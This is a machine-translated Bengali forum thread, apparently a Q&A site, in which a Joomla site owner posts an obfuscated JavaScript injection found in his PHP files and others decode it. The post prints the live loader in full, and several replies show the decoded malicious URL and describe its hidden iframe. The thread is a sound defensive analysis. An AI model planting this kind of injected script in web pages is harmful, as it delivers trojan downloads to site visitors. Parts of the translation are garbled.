এই সাইটটি সংক্রামিত স্ক্রিপ্ট কীভাবে কাজ করে?

Question 1

আমার জুমলা! ওয়েবসাইট বারবার হ্যাক করা হয়েছে। কেউ, কোনওভাবে, নিম্নলিখিত পিএইচপি স্ক্রিপ্টগুলিতে নিম্নলিখিত আবর্জনা ইনজেক্ট করতে সক্ষম হয়েছেন, তবে আমি জুমলা কনফিগার করার বিষয়ে কথা বলতে চাইছি না। সাইটটি খুব বেশি পরিদর্শন করা হয় না (অনেক সময় আমি আশঙ্কা করি যে আমি সেই সাইটের একমাত্র দর্শক হতে পারি ...) এবং সাইটটি ব্যাক আপ এবং চলমান রাখার জন্য আমি খুব বেশি যত্ন করি না। আমি শেষ পর্যন্ত হ্যান্ডেল করব।

আমার প্রশ্ন, এই জঞ্জাল কীভাবে কাজ করে? আমি এটি তাকান এবং আমি কেবল দেখতে পাচ্ছি না কীভাবে এটি কোনও ক্ষতি করতে পরিচালিত করে? এটি কী করে তা চেঞ্জলগ.পিডিএফ নামে একটি পিডিএফ ফাইল ডাউনলোড করার চেষ্টা করে যা ট্রোজানে আক্রান্ত হয় এবং খোলার পরে আপনার মেশিনে আপনার অ্যাক্রোব্যাট এবং ধ্বংসাত্মক পরিস্থিতি নিথর করে দেয়। এটি কীভাবে করে, আমি জানি না, আমি চিন্তা করি না। তবে স্ক্রিপ্টের নীচের অংশটি কীভাবে ডাউনলোডের জন্য আবেদন করে?

<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->

ইএসইটি এই কোডটি জেএস / ট্রোজানডাউনলোডার.এজেন্ট.এনআরও ট্রোজান হিসাবে সনাক্ত করেছে

Question 2

লক্ষ্য করুন replaceদৈত্য নোংরা স্ট্রিং পরে কল: .replace(/#|\$|@|\^|&|$|$|\!/ig, '')।

এটি বেশিরভাগ বিশেষ অক্ষরকে সরিয়ে দেয়, এটি একটি সাধারণ ইউআরএল রূপান্তরিত করে:

evil://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

(আমি নিজে পরিবর্তিত http:করতে evil:)

দ্রষ্টব্য যে রেজেক্সে সরলীকরণ করা যেতে পারে .replace(/[#$@^&()!]/ig, '')

আপনি যদি স্ক্রিপ্টটি দেখুন, আপনি দেখতে পাবেন যে এটি একটি খুব সাধারণ স্ক্রিপ্ট যা /index.php?ysএকই ডোমেন থেকে পাথ থাকা একটি গোপন আইএফআরএমে সংক্রামিত করে ।

আমি সেই পৃষ্ঠাটি ফিডলারে অনুরোধ করেছি এবং এতে কোনও সামগ্রী নেই।

Question 3

এই উত্তরগুলি আপনাকে দূষিত জাভাস্ক্রিপ্ট কোডের প্রকৃতি বুঝতে সাহায্য করতে পারে তবে জুমলা ইঞ্জিনে লুফোল ইনহেন্টেন্টকে বন্ধ করার একটি উপায়। প্রাক-প্যাকেজযুক্ত ফ্রেমওয়ার্কগুলি ইচ্ছাকৃত বা অনিচ্ছাকৃতভাবে ফাঁকফোকরগুলির ঝুঁকিপূর্ণ হয়, বিশেষত আপনি যখন বিবেচনায় রাখেন যে তারা ইউনিক্স, ম্যাক এবং উইন্ডো পরিবেশে কাজ করার জন্য ইঞ্জিনিয়ার হয়েছে।

আমার কাজের প্রয়োজন আমি ক্লায়েন্ট এবং আমার নিজের জন্য অনেক ধরণের সার্ভার এবং সিস্টেমে অনেকগুলি ডোমেন, অ্যাপ্লিকেশন এবং ফ্রেমওয়ার্কগুলি চালিত করি। সময়ের সাথে সাথে আমি আরও দেখেছি যে আরও বেশি করে বটগুলি এই সিস্টেমে ক্রলিং করে সেই ফ্রেমওয়ার্কগুলির দ্বারা তৈরি পিছনের দরজা বাই বাই দরজা প্রবেশ পথগুলি সন্ধান করছে known আমি যখনই খুব সহজেই যে কোনও ধরণের কাঠামো ব্যবহার করি তখন ভাল কথা, আমি সেই ফাইলের কাঠামো / পিছনের দরজাগুলি থেকে নিজেকে মুক্ত করার জন্য পুরো ফাইলের কাঠামো না থাকলে বেশিরভাগটির নামকরণ নিশ্চিত করে নিই। খুব কমপক্ষে আপনি ডিরেক্টরিগুলির নাম পরিবর্তন করতে পারেন যা বেশিরভাগ বটগুলি ছুঁড়ে ফেলে দেবে, তবে আমার উপায় হ'ল রেফারেন্সগুলি সম্পূর্ণভাবে মুছে ফেলা যা ফ্রেমওয়ার্কের প্রকৃতি হিসাবে সংকেত দেয় যা কেবলমাত্র ডিরেক্টরিগুলি নয় পুরো ফাইল কাঠামোর নামকরণও অন্তর্ভুক্ত করে। আপনার বেস কাঠামোটিতে প্লাগ-ইনগুলি যোগ করার জন্য স্ন্যাপটি রাখতে সর্বদা পুরানো নামকরণ কনভেনশনগুলির তুলনায় নতুন নামকরণের সম্মেলনের মানচিত্র রাখুন। এটির হ্যাংটি পেয়ে গেলে আপনি দ্রুত ফলাফলের জন্য পুরো কাঠামো ফাইলের কাঠামোর নামকরণ হিসাবে যতটা অগ্রগতিতে যেতে পারেন, প্লাগইনগুলি এবং তাদের মতো করে তাদের কাঠামো আপডেট করতে সক্ষম ক্লায়েন্টদের সাথে কাজ করার সময় এটি বিশেষত কার্যকর।

Question 4

এটি আপনাকে দেওয়ার জন্য স্ক্রিপ্ট url এ কেবলমাত্র একটি রেজেক্স প্রতিস্থাপন করে

দ্রষ্টব্য: নীচের লিঙ্কটি অনুসরণ করবেন না ( **অনুলিপিগুলি অনুলিপি করার জন্য sertedোকানো হয়েছে)

http**://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

হিসাবে src

Question 5

এটি রিজেক্স ব্যবহার করে আবর্জনা চরগুলি প্রতিস্থাপনের জন্য প্রতিস্থাপন ফাংশনটি ব্যবহার করে, কোডটিতে কোনও ভুল নেই:

 ........replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')

Question 6

এর লোড স্ক্রিপ্ট থেকে

h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/softonic.com/softonic.com/google.com/livejasmin.com/videosz.com/

এবং সেই স্ক্রিপ্টটি iframeদৃশ্যমানতা থেকে লোডhidden

h..p://dyndns-org.gamestop.com.mybestyouxi-cn.genuinehollywood.ru:8080/index.php?ys

Question 7

আপনি যখন পুরো জিনিসটি পড়েন, আপনি দেখতে পাবেন এটি একটি স্ট্রিং এবং তারপরে একটি প্রতিস্থাপন কমান্ড অনুসরণ করবে।

Question 8

সূচী *। * ফাইলগুলিতে আমার পৃষ্ঠাগুলিতে আমার একই ছাপ রয়েছে। আমি পিএইচপিতে নিজের কোডটি লিখছি। আমার প্রশ্নটি কীভাবে এটি কাজ করে তা নয়, তবে আপনি যদি তাদের বাড়ির দরজা জানেন তবে কীভাবে সুরক্ষা করবেন তা আমি জিজ্ঞাসা করছি। আমি ফর্মগুলি পরিবর্তন করেছি এবং <> এবং http: // ইত্যাদি প্রতিস্থাপন সহ $ _POST এবং $ _GET পড়ছি

Question 9

আমার দুই সেন্ট. আপনি / আপনি জুমলাপ্যাকের মতো একটি জুমলা ব্যাকআপ সরঞ্জাম ইনস্টল করতে পারবেন?

ম্যাগাররা জড়িয়ে পড়ার ক্ষেত্রে জিনিসটি সহজ রাখার জন্য আমি এটি একটি CHRON স্ক্রিপ্টের মাধ্যমে চালানোর জন্য সেট করেছি।

আপনি জুমলার কোন সংস্করণটি চালাচ্ছেন?

1.0.X সংস্করণগুলি আর আপডেট করা হচ্ছে না এবং এটির বয়স সত্যই দেখাতে শুরু করেছে। আপনি এটির জন্য একটি ব্যাকআপ করুন এবং 1.5 এ আপগ্রেড করার এবং 1.6 এর বিস্ময়ের পূর্বাভাস দেওয়ার owণী